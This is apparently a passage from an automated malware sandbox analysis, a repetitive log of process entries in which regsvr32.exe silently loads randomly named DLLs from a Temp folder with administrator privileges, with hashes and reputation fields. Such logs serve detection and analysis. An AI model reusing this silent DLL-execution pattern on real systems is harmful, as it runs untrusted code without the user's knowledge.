                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:16:02:56
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\kxwni.dll
                                                                                                Imagebase:0x9e0000
                                                                                                File size:14848 bytes
                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:16:02:56
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:16:03:04
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:16:03:05
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0x9e0000
                                                                                                File size:14848 bytes
                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:16:03:16
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:16:03:20
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline: -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
                                                                                                Imagebase:0x9e0000
                                                                                                File size:14848 bytes
                                                                                                MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:16:03:57
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:16:03:57
                                                                                                Start date:21/01/2021
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
                                                                                                Imagebase:0xff3f0000
                                                                                                File size:19456 bytes
                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:04:03
Start date:21/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Imagebase:0xff3f0000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:04:04
Start date:21/01/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Imagebase:0x9e0000
File size:14848 bytes
MD5 hash:432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:16:04:05
Start date:21/01/2021
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Imagebase:0xff3f0000
File size:19456 bytes
MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:16:04:05
Start date:21/01/2021
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Imagebase:0x9e0000
File size:14848 bytes
MD5 hash:432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
